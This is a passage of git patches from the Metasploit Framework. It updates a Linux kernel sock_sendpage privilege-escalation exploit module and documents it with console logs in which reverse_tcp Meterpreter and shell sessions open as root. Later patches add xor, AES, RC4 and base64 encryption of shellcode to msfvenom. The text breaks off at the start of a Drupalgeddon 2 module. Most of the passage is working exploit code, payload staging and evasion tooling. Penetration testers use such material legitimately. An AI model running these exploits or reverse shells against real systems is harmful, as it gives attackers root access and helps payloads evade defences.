From fc7040099cec89180f4c6c2689d77fdd48006e96 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Tue, 10 Apr 2018 11:15:42 +0000 Subject: [PATCH 01/65] Update Linux sock_sendpage local exploit module --- modules/exploits/linux/local/sock_sendpage.rb | 225 ++++++++++++------ 1 file changed, 147 insertions(+), 78 deletions(-) diff --git a/modules/exploits/linux/local/sock_sendpage.rb b/modules/exploits/linux/local/sock_sendpage.rb index 1e27130525..d49985f977 100644 --- a/modules/exploits/linux/local/sock_sendpage.rb +++ b/modules/exploits/linux/local/sock_sendpage.rb @@ -10,84 +10,152 @@ require 'msf/core/exploit/exe' class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking - include Msf::Exploit::EXE include Msf::Post::File - + include Msf::Post::Linux::Priv + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper include Msf::Exploit::Local::LinuxKernel include Msf::Exploit::Local::Linux - def initialize(info={}) - super( update_info( info, { - 'Name' => 'Linux Kernel Sendpage Local Privilege Escalation', - 'Description' => %q{ - The Linux kernel failed to properly initialize some entries the - proto_ops struct for several protocols, leading to NULL being - dereferenced and used as a function pointer. By using mmap(2) to map - page 0, an attacker can execute arbitrary code in the context of the - kernel. + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linux Kernel Sendpage Local Privilege Escalation', + 'Description' => %q{ + The Linux kernel failed to properly initialize some entries in the + proto_ops struct for several protocols, leading to NULL being + dereferenced and used as a function pointer. By using mmap(2) to map + page 0, an attacker can execute arbitrary code in the context of the + kernel. - Several public exploits exist for this vulnerability, including - spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. + Several public exploits exist for this vulnerability, including + spender's wunderbar_emporium and rcvalle's ppc port, sock_sendpage.c. - All Linux 2.4/2.6 versions since May 2001 are believed to be affected: - 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4 - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Tavis Ormandy', # discovery - 'Julien Tinnes ', # discovery - 'spender', # wunderbar_emporium.tgz - 'rcvalle', # sock_sendpage.c - 'egypt' # metasploit module - ], - 'Platform' => [ 'linux' ], - 'Arch' => [ ARCH_X86 ], - 'SessionTypes' => [ 'shell', 'meterpreter' ], - 'References' => - [ - [ 'CVE', '2009-2692' ], - [ 'OSVDB', '56992' ], - [ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ] - ], - 'Targets' => - [ - [ 'Linux x86', { 'Arch' => ARCH_X86 } ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => "Aug 13 2009", - } - )) - register_options([ - OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]), - ]) - register_options([ - OptBool.new("DEBUG_EXPLOIT", [ true, "Make the exploit executable be verbose about what it's doing", false ]), - ]) + All Linux 2.4/2.6 versions since May 2001 are believed to be affected: + 2.4.4 up to and including 2.4.37.4; 2.6.0 up to and including 2.6.30.4 + + This module has been tested successfully on CentOS 5.0 (i386) with + kernel version 2.6.18-8.1.1.tl5; and Debian 3.1r8 Sarge (i686) with + kernel version 2.4.27-3-386. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tavis Ormandy', # discovery + 'Julien Tinnes ', # discovery + 'spender', # wunderbar_emporium.tgz + 'rcvalle', # sock_sendpage.c + 'egypt' # metasploit module + ], + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'References' => + [ + [ 'CVE', '2009-2692' ], + [ 'EDB', '9545' ], + [ 'EDB', '9641' ], + [ 'BID', '36038' ], + [ 'URL', 'https://www.securityfocus.com/archive/1/505751' ], + [ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ] + ], + 'Targets' => + [ + [ 'Linux x86', { 'Arch' => ARCH_X86 } ] + ], + 'DisclosureDate' => 'Aug 13 2009', + 'DefaultTarget' => 0)) + register_options [ + OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), + OptBool.new('DEBUG_EXPLOIT', [ true, "Make the exploit executable be verbose about what it's doing", false ]) + ] end - def executable_path - @executable_path ||= datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + def base_dir + datastore['WritableDir'] + end - @executable_path + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def check + version = Gem::Version.new kernel_release.split('-').first + + if version.to_s.eql? '' + vprint_error 'Could not determine the kernel version' + return CheckCode::Unknown + end + + if version.between?(Gem::Version.new('2.4.4'), Gem::Version.new('2.4.37.4')) || + version.between?(Gem::Version.new('2.6.0'), Gem::Version.new('2.6.30.4')) + vprint_good "Kernel version #{version} appears to be vulnerable" + else + vprint_error "Kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + + arch = kernel_hardware + unless arch.include?('x86') || arch =~ /i\d86/ + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + if arch.include? 'x86_64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + mmap_min_addr_path = '/proc/sys/vm/mmap_min_addr' + if file_exist? mmap_min_addr_path + mmap_min_addr = read_file mmap_min_addr_path + else + mmap_min_addr = '' + end + + case mmap_min_addr + when '' + vprint_good 'vm.mmap_min_addr is not set' + when '0' + vprint_good 'vm.mmap_min_addr is zero' + else + vprint_error "vm.mmap_min_addr (#{mmap_min_addr}) is not zero" + return CheckCode::Safe + end + + CheckCode::Appears end def exploit - sc = Metasm::ELF.new(@cpu) + if check == CheckCode::Safe + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + sc = Metasm::ELF.new @cpu sc.parse %Q| #ifdef __ELF__ .section ".bss" rwx .section ".text" rwx #endif | - current_task_struct_h(sc) - if datastore["DEBUG_EXPLOIT"] + current_task_struct_h sc + + if datastore['DEBUG_EXPLOIT'] cparser.parse "#define DEBUG\n" end - case target.arch.first - when ARCH_X86 - main = %q^ + main = %q^ struct _IO_FILE; typedef void _IO_lock_t; @@ -244,6 +312,7 @@ int *apparmor_enabled; int got_ring0 = 0; unsigned long uid, gid; +/* static unsigned long get_kernel_sym(char *name) { FILE *f; @@ -278,7 +347,7 @@ static unsigned long get_kernel_sym(char *name) fclose(f); return 0; } - +*/ static void change_cred(void) @@ -403,24 +472,22 @@ int main(int argc, char **argv) { return got_ring0; } - ^ - main.gsub!(/SHELLCODE/) do - # Split the payload into chunks and dump it out as a hex-escaped - # literal C string. - Rex::Text.to_c(payload.encoded, 64, "shellcode") - end - main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}") - cparser.parse(main, "main.c") - #$stderr.puts cparser.factorize - #return - - asm = cpu.new_ccompiler(cparser, sc).compile - - sc.parse asm + main.gsub!(/SHELLCODE/) do + # Split the payload into chunks and dump it out as a hex-escaped + # literal C string. + Rex::Text.to_c payload.encoded, 64, 'shellcode' end + main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}") + cparser.parse main, 'main.c' + #$stderr.puts cparser.factorize + #return + + asm = cpu.new_ccompiler(cparser, sc).compile + + sc.parse asm sc.assemble sc.c_set_default_entrypoint @@ -429,7 +496,7 @@ int main(int argc, char **argv) { elf = sc.encode_string else foo = sc.encode_string - elf = Msf::Util::EXE.to_linux_x86_elf(framework, foo) + elf = Msf::Util::EXE.to_linux_x86_elf framework, foo end rescue print_error "Metasm Encoding failed: #{$!}" @@ -438,11 +505,13 @@ int main(int argc, char **argv) { return end - print_status "Writing exploit executable to #{executable_path} (#{elf.length} bytes)" - rm_f executable_path - write_file(executable_path, elf) - output = cmd_exec("chmod +x #{executable_path}; #{executable_path}") - output.each_line { |line| vprint_status(line.chomp) } + payload_path = "#{base_dir}/.#{rand_text_alphanumeric 8..12}" + upload payload_path, elf + cmd_exec "chmod +x #{payload_path}" + + print_status 'Executing payload...' + output = cmd_exec payload_path + output.each_line { |line| vprint_status line.chomp } end end From 608e53ea89eaf3882464fc80351e04d632b1e541 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Tue, 10 Apr 2018 14:18:22 +0000 Subject: [PATCH 02/65] Add documentation --- .../exploit/linux/local/sock_sendpage.md | 121 ++++++++++++++++++ 1 file changed, 121 insertions(+) create mode 100644 documentation/modules/exploit/linux/local/sock_sendpage.md diff --git a/documentation/modules/exploit/linux/local/sock_sendpage.md b/documentation/modules/exploit/linux/local/sock_sendpage.md new file mode 100644 index 0000000000..5db2fadcaa --- /dev/null +++ b/documentation/modules/exploit/linux/local/sock_sendpage.md @@ -0,0 +1,121 @@ +## Description + + The Linux kernel failed to properly initialize some entries in the + `proto_ops` struct for several protocols, leading to `NULL` being + dereferenced and used as a function pointer. By using `mmap(2)` to map + page 0, an attacker can execute arbitrary code in the context of the + kernel. + + +## Vulnerable Application + + Several public exploits exist for this vulnerability, including + spender's `wunderbar_emporium` and rcvalle's ppc port, `sock_sendpage.c`. + + All Linux 2.4/2.6 versions since May 2001 are believed to be affected: + + * 2.4.4 up to and including 2.4.37.4 + * 2.6.0 up to and including 2.6.30.4 + + This module has been tested successfully on: + + * CentOS 5.0 (i386) with kernel version 2.6.18-8.1.1.tl5 + * Debian 3.1r8 Sarge (i686) with kernel version 2.4.27-3-386 + + +## Verification Steps + + 1. Start `msfconsole` + 2. Get a session + 3. `use exploit/linux/local/sock_sendpage` + 4. `set SESSION [SESSION]` + 5. `check` + 6. `run` + 7. You should get a new *root* session + + +## Options + + **SESSION** + + Which session to use, which can be viewed with `sessions` + + **WritableDir** + + A writable directory file system path. (default: `/tmp`) + + **DEBUG_EXPLOIT** + + Enable exploit debug messages. (default: `false`) + + +## Scenarios + + **CentOS 5.0 (i386) with kernel version 2.6.18-8.1.1.tl5** + + ``` + msf > use exploit/linux/local/sock_sendpage + msf exploit(linux/local/sock_sendpage) > set session 1 + session => 1 + msf exploit(linux/local/sock_sendpage) > set verbose true + verbose => true + msf exploit(linux/local/sock_sendpage) > set payload linux/x86/meterpreter/reverse_tcp + payload => linux/x86/meterpreter/reverse_tcp + msf exploit(linux/local/sock_sendpage) > run + + [!] SESSION may not be compatible with this module. + [*] Started reverse TCP handler on 172.16.191.188:4444 + [+] Kernel version 2.6.18 appears to be vulnerable + [+] System architecture i686 is supported + [+] vm.mmap_min_addr is not set + [*] Writing '/tmp/.MCpzrCREnMXU' (3509 bytes) ... + [*] Max line length is 65537 + [*] Writing 3509 bytes in 1 chunks of 10560 bytes (octal-encoded), using printf + [*] Executing payload... + [*] Transmitting intermediate stager...(106 bytes) + [*] Sending stage (857352 bytes) to 172.16.191.159 + [*] Meterpreter session 34 opened (172.16.191.188:4444 -> 172.16.191.159:37663) at 2018-04-10 06:50:13 -0400 + + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0 + meterpreter > sysinfo + Computer : 172.16.191.159 + OS : CentOS 5 (Linux 2.6.18-8.1.1.tl5) + Architecture : i686 + BuildTuple : i486-linux-musl + Meterpreter : x86/linux + ``` + + **Debian 3.1r8 Sarge (i686) with kernel version 2.4.27-3-386** + + ``` + msf > use exploit/linux/local/sock_sendpage + msf exploit(linux/local/sock_sendpage) > set payload linux/x86/shell/reverse_tcp + payload => linux/x86/shell/reverse_tcp + msf exploit(linux/local/sock_sendpage) > set session 1 + session => 1 + msf exploit(linux/local/sock_sendpage) > run + + [!] SESSION may not be compatible with this module. + [*] Started reverse TCP handler on 172.16.191.188:4444 + [+] Kernel version 2.4.27 appears to be vulnerable + [+] System architecture i686 is supported + [+] vm.mmap_min_addr is not set + [*] Writing '/tmp/.69p3FeagB' (3509 bytes) ... + [*] Max line length is 65537 + [*] Writing 3509 bytes in 1 chunks of 10560 bytes (octal-encoded), using printf + [*] Executing payload... + [*] Sending stage (36 bytes) to 172.16.191.227 + [*] Command shell session 35 opened (172.16.191.188:4444 -> 172.16.191.227:32836) at 2018-04-10 06:59:08 -0400 + [!] Tried to delete /tmp/.69p3FeagB, unknown result + + 3356110123 + lfvaliLFShnAfRQkCHUXFtuyGXKylJSN + TJloQpOJsrsnQSfZpNAjWcbqNuHanLeI + LeKIAUjwBMRhxjJjVvvrdvwErYZnxPYr + id + uid=0(root) gid=0(root) groups=100(users) + uname -a + Linux sarge 2.4.27-3-386 #1 Wed Dec 6 00:38:33 UTC 2006 i686 GNU/Linux + ``` + From b630d5c3279f7cbbbcf1c2fc821fdb16bf6b392b Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 10 Apr 2018 11:14:14 -0500 Subject: [PATCH 03/65] Add encryption support for shellcode --- lib/msf/base/simple/buffer.rb | 36 +++++++++++++++++++- lib/msf/core/payload_generator.rb | 22 ++++++++++-- msfvenom | 56 +++++++++++++++++++++---------- 3 files changed, 93 insertions(+), 21 deletions(-) diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index c093e9f3ca..3fd7137f8e 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -18,9 +18,13 @@ module Buffer # Serializes a buffer to a provided format. The formats supported are raw, # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh # - def self.transform(buf, fmt = "ruby", var_name = 'buf') + def self.transform(buf, fmt = "ruby", var_name = 'buf', encryption_opts={}) default_wrap = 60 + unless encryption_opts.empty? + buf = encrypt_buffer(buf, encryption_opts) + end + case fmt when 'raw' when 'num' @@ -120,6 +124,36 @@ module Buffer ] end + def self.encryption_formats + [ + 'xor', + 'base64', + 'aes256', + 'rc4' + ] + end + + private + + def self.encrypt_buffer(value, encryption_opts) + buf = '' + + case encryption_opts[:format] + when 'aes256' + buf = Rex::Text.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value) + when 'base64' + buf = Rex::Text.encode_base64(value) + when 'xor' + buf = Rex::Text.xor(encryption_opts[:key], value) + when 'rc4' + buf = Rex::Text.rc4(encryption_opts[:key], value) + else + raise ArgumentError, "Unsupported encryption format: #{encryption_opts[:format]}", caller + end + + return buf + end + end end diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index a54fb39482..feef906614 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -83,6 +83,15 @@ module Msf # @!attribute var_name # @return [String] The custom variable string for certain output formats attr_accessor :var_name + # @!attribute encryption_format + # @return [String] The encryption format to use for the shellcode. + attr_accessor :encryption_format + # @!attribute encryption_key + # @return [String] The key to use for the encryption + attr_accessor :encryption_key + # @!attribute encryption_iv + # @return [String] The initialization vector for the encryption (not all apply) + attr_accessor :encryption_iv # @param opts [Hash] The options hash @@ -123,6 +132,9 @@ module Msf @var_name = opts.fetch(:var_name, 'buf') @smallest = opts.fetch(:smallest, false) @encoder_space = opts.fetch(:encoder_space, @space) + @encryption_format = opts.fetch(:encryption_format, 'base64') + @encryption_key = opts.fetch(:encryption_key, '') + @encryption_iv = opts.fetch(:encryption_iv, '') @framework = opts.fetch(:framework) @@ -276,15 +288,21 @@ module Msf # @param shellcode [String] the processed shellcode to be formatted # @return [String] The final formatted form of the payload def format_payload(shellcode) + encryption_opts = { + format: encryption_format, + iv: encryption_iv, + key: encryption_key + } + case format.downcase when "js_be" if Rex::Arch.endian(arch) != ENDIAN_BIG raise IncompatibleEndianess, "Big endian format selected for a non big endian payload" else - ::Msf::Simple::Buffer.transform(shellcode, format, @var_name) + ::Msf::Simple::Buffer.transform(shellcode, format, @var_name, encryption_opts) end when *::Msf::Simple::Buffer.transform_formats - ::Msf::Simple::Buffer.transform(shellcode, format, @var_name) + ::Msf::Simple::Buffer.transform(shellcode, format, @var_name, encryption_opts) when *::Msf::Util::EXE.to_executable_fmt_formats ::Msf::Util::EXE.to_executable_fmt(framework, arch, platform_list, shellcode, format, exe_options) else diff --git a/msfvenom b/msfvenom index a8bff91d8b..62804419a0 100755 --- a/msfvenom +++ b/msfvenom @@ -63,12 +63,13 @@ def parse_args(args) opt = OptionParser.new banner = "MsfVenom - a Metasploit standalone payload generator.\n" banner << "Also a replacement for msfpayload and msfencode.\n" - banner << "Usage: #{$0} [options] " + banner << "Usage: #{$0} [options] \n" + banner << "Example: #{$0} -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe" opt.banner = banner opt.separator('') opt.separator('Options:') - opt.on('-p', '--payload ', String, + opt.on('-p', '--payload ', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| if p == '-' opts[:payload] = 'stdin' @@ -81,18 +82,18 @@ def parse_args(args) opts[:list_options] = true end - opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| if l.nil? or l.empty? l = ["all"] end opts[:list] = l end - opt.on('-n', '--nopsled ', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opt.on('-n', '--nopsled ', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| opts[:nops] = n.to_i end - opt.on('-f', '--format ', String, "Output format (use --help-formats for a list)") do |f| + opt.on('-f', '--format ', String, "Output format (use --help-formats for a list)") do |f| opts[:format] = f end @@ -105,15 +106,34 @@ def parse_args(args) raise HelpError, msg end - opt.on('-e', '--encoder ', String, 'The encoder to use') do |e| + opt.on('--encryptor ', String, 'The type of encryptor or encoder to use for the shellcode') do |e| + opts[:encryption_format] = e + end + + opt.on('--encrypt-formats', String, 'List Available encryption formats') do + init_framework(:module_types => []) + msg = "Encryption formats:\n" + + "\t" + ::Msf::Simple::Buffer.encryption_formats.join(", ") + raise HelpError, msg + end + + opt.on('--encrypt-key ', String, 'A key to be used for the encryptor') do |e| + opts[:encryption_key] = e + end + + opt.on('--encrypt_iv ', String, 'An init vector for the encryption') do |e| + opts[:encryption_iv] = e + end + + opt.on('-e', '--encoder ', String, 'The encoder to use') do |e| opts[:encoder] = e end - opt.on('-a', '--arch ', String, 'The architecture to use') do |a| + opt.on('-a', '--arch ', String, 'The architecture to use') do |a| opts[:arch] = a end - opt.on('--platform ', String, 'The platform of the payload') do |l| + opt.on('--platform ', String, 'The platform of the payload') do |l| opts[:platform] = l end @@ -126,28 +146,28 @@ def parse_args(args) raise HelpError, msg end - opt.on('-s', '--space ', Integer, 'The maximum size of the resulting payload') do |s| + opt.on('-s', '--space ', Integer, 'The maximum size of the resulting payload') do |s| opts[:space] = s end - opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| + opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| opts[:encoder_space] = s end - opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| init_framework() opts[:badchars] = Rex::Text.hex_to_raw(b) end - opt.on('-i', '--iterations ', Integer, 'The number of times to encode the payload') do |i| + opt.on('-i', '--iterations ', Integer, 'The number of times to encode the payload') do |i| opts[:iterations] = i end - opt.on('-c', '--add-code ', String, 'Specify an additional win32 shellcode file to include') do |x| + opt.on('-c', '--add-code ', String, 'Specify an additional win32 shellcode file to include') do |x| opts[:add_code] = x end - opt.on('-x', '--template ', String, 'Specify a custom executable file to use as a template') do |x| + opt.on('-x', '--template ', String, 'Specify a custom executable file to use as a template') do |x| opts[:template] = x end @@ -155,11 +175,11 @@ def parse_args(args) opts[:keep] = true end - opt.on('-o', '--out ', 'Save the payload') do |x| + opt.on('-o', '--out ', 'Save the payload') do |x| opts[:out] = x end - opt.on('-v', '--var-name ', String, 'Specify a custom variable name to use for certain output formats') do |x| + opt.on('-v', '--var-name ', String, 'Specify a custom variable name to use for certain output formats') do |x| opts[:var_name] = x end @@ -331,8 +351,8 @@ if generator_opts[:list_options] $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') - $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n" - $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, ' ') + $stderr.puts "encrypt options for #{payload_mod.fullname}:\n\n" + $stdout.puts ::Msf::Serializer::ReadableText.dump_encrypt_options(payload_mod, ' ') exit(0) end From 13edf66fa3f80da00e70b35d3ac2d7b28b55107c Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 10 Apr 2018 18:57:02 -0500 Subject: [PATCH 04/65] Fix options --- lib/msf/core/payload_generator.rb | 15 +++++++-------- msfvenom | 2 +- 2 files changed, 8 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index feef906614..577f591d35 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -132,9 +132,9 @@ module Msf @var_name = opts.fetch(:var_name, 'buf') @smallest = opts.fetch(:smallest, false) @encoder_space = opts.fetch(:encoder_space, @space) - @encryption_format = opts.fetch(:encryption_format, 'base64') - @encryption_key = opts.fetch(:encryption_key, '') - @encryption_iv = opts.fetch(:encryption_iv, '') + @encryption_format = opts.fetch(:encryption_format, nil) + @encryption_key = opts.fetch(:encryption_key, nil) + @encryption_iv = opts.fetch(:encryption_iv, nil) @framework = opts.fetch(:framework) @@ -288,11 +288,10 @@ module Msf # @param shellcode [String] the processed shellcode to be formatted # @return [String] The final formatted form of the payload def format_payload(shellcode) - encryption_opts = { - format: encryption_format, - iv: encryption_iv, - key: encryption_key - } + encryption_opts = {} + encryption_opts[:format] = encryption_format if encryption_format + encryption_opts[:iv] = encryption_iv if encryption_iv + encryption_opts[:key] = encryption_key if encryption_key case format.downcase when "js_be" diff --git a/msfvenom b/msfvenom index 62804419a0..b58d5103fa 100755 --- a/msfvenom +++ b/msfvenom @@ -121,7 +121,7 @@ def parse_args(args) opts[:encryption_key] = e end - opt.on('--encrypt_iv ', String, 'An init vector for the encryption') do |e| + opt.on('--encrypt-iv ', String, 'An init vector for the encryption') do |e| opts[:encryption_iv] = e end From 19e76329dc1689d23efbafc1aa272ad9ccce37c6 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 11 Apr 2018 13:02:35 -0500 Subject: [PATCH 05/65] Add some checks in buffer.rb and fix option in msfvenom --- lib/msf/base/simple/buffer.rb | 14 ++++++++++++++ msfvenom | 2 +- 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index 3fd7137f8e..23deb89168 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -140,12 +140,26 @@ module Buffer case encryption_opts[:format] when 'aes256' + if encryption_opts[:iv].blank? + raise ArgumentError, 'Initialization vector is missing' + elsif encryption_opts[:key].blank? + raise ArgumentError, 'Encryption key is missing' + end + buf = Rex::Text.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value) when 'base64' buf = Rex::Text.encode_base64(value) when 'xor' + if encryption_opts[:key].blank? + raise ArgumentError, 'XOR key is missing' + end + buf = Rex::Text.xor(encryption_opts[:key], value) when 'rc4' + if encryption_opts[:key].blank? + raise ArgumentError, 'Encryption key is missing' + end + buf = Rex::Text.rc4(encryption_opts[:key], value) else raise ArgumentError, "Unsupported encryption format: #{encryption_opts[:format]}", caller diff --git a/msfvenom b/msfvenom index b58d5103fa..be66f3e2b7 100755 --- a/msfvenom +++ b/msfvenom @@ -121,7 +121,7 @@ def parse_args(args) opts[:encryption_key] = e end - opt.on('--encrypt-iv ', String, 'An init vector for the encryption') do |e| + opt.on('--encrypt-iv ', String, 'An initialization vector for the encryption') do |e| opts[:encryption_iv] = e end From 760eac005f687f0bd4348aaa99564c4ef039c33a Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Thu, 12 Apr 2018 16:48:33 +1000 Subject: [PATCH 06/65] Minor update to documentation --- documentation/modules/exploit/linux/local/sock_sendpage.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/linux/local/sock_sendpage.md b/documentation/modules/exploit/linux/local/sock_sendpage.md index 5db2fadcaa..af9d5d55f1 100644 --- a/documentation/modules/exploit/linux/local/sock_sendpage.md +++ b/documentation/modules/exploit/linux/local/sock_sendpage.md @@ -3,7 +3,7 @@ The Linux kernel failed to properly initialize some entries in the `proto_ops` struct for several protocols, leading to `NULL` being dereferenced and used as a function pointer. By using `mmap(2)` to map - page 0, an attacker can execute arbitrary code in the context of the + page `0`, an attacker can execute arbitrary code in the context of the kernel. @@ -51,7 +51,7 @@ ## Scenarios - **CentOS 5.0 (i386) with kernel version 2.6.18-8.1.1.tl5** + ### CentOS 5.0 (i386) with kernel version 2.6.18-8.1.1.tl5 ``` msf > use exploit/linux/local/sock_sendpage @@ -86,7 +86,7 @@ Meterpreter : x86/linux ``` - **Debian 3.1r8 Sarge (i686) with kernel version 2.4.27-3-386** + ### Debian 3.1r8 Sarge (i686) with kernel version 2.4.27-3-386 ``` msf > use exploit/linux/local/sock_sendpage From c0c9389b33b443f0e4ece04692ad7d91d00fd3d6 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 12 Apr 2018 10:59:28 -0500 Subject: [PATCH 07/65] Update Gemfile.lock for encryptive outputs for msfvenom --- Gemfile.lock | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6947e2682f..285557480a 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -187,6 +187,7 @@ GEM mini_portile2 (~> 2.3.0) octokit (4.8.0) sawyer (~> 0.8.0, >= 0.5.3) + openssl (2.1.0) openssl-ccm (1.2.1) openvas-omp (0.0.4) packetfu (1.1.13) @@ -275,7 +276,9 @@ GEM rex-socket rex-text rex-struct2 (0.1.2) - rex-text (0.2.17) + rex-text (0.2.18) + openssl + ruby-rc4 rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) From 4e55724f3fbc8cae1298401283c4c868e9cdb2fc Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 12 Apr 2018 14:10:26 -0500 Subject: [PATCH 08/65] Fix a typo and rspec for payload generator --- msfvenom | 2 +- spec/lib/msf/core/payload_generator_spec.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/msfvenom b/msfvenom index be66f3e2b7..407233b294 100755 --- a/msfvenom +++ b/msfvenom @@ -351,7 +351,7 @@ if generator_opts[:list_options] $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n" $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, ' ') - $stderr.puts "encrypt options for #{payload_mod.fullname}:\n\n" + $stderr.puts "Encryption options for #{payload_mod.fullname}:\n\n" $stdout.puts ::Msf::Serializer::ReadableText.dump_encrypt_options(payload_mod, ' ') exit(0) end diff --git a/spec/lib/msf/core/payload_generator_spec.rb b/spec/lib/msf/core/payload_generator_spec.rb index 2c5736065a..438ca0ccaa 100644 --- a/spec/lib/msf/core/payload_generator_spec.rb +++ b/spec/lib/msf/core/payload_generator_spec.rb @@ -1056,7 +1056,7 @@ RSpec.describe Msf::PayloadGenerator do } } it 'applies the appropriate transform format' do - expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf') + expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf'. {}) payload_generator.format_payload(shellcode) end end From ee9f49fa394c8b827a1b3e33b84a478ea49756e7 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 12 Apr 2018 14:45:54 -0500 Subject: [PATCH 09/65] Fix a typo --- spec/lib/msf/core/payload_generator_spec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spec/lib/msf/core/payload_generator_spec.rb b/spec/lib/msf/core/payload_generator_spec.rb index 438ca0ccaa..ab7b83bafb 100644 --- a/spec/lib/msf/core/payload_generator_spec.rb +++ b/spec/lib/msf/core/payload_generator_spec.rb @@ -1056,7 +1056,7 @@ RSpec.describe Msf::PayloadGenerator do } } it 'applies the appropriate transform format' do - expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf'. {}) + expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf', {}) payload_generator.format_payload(shellcode) end end From d8508b8d7d79b6f2c4ce5a6f5c314e472d6ffa68 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 13 Apr 2018 18:15:28 -0500 Subject: [PATCH 10/65] Add Drupal Drupalgeddon 2 --- .../unix/webapp/drupal_drupalgeddon2.rb | 103 ++++++++++++++++++ 1 file changed, 103 insertions(+) create mode 100644 modules/exploits/unix/webapp/drupal_drupalgeddon2.rb diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb new file mode 100644 index 0000000000..3c069c0637 --- /dev/null +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Drupal Drupalgeddon 2', + 'Description' => %q{ + This module exploits a vulnerability. + }, + 'Author' => [ + 'Jasper 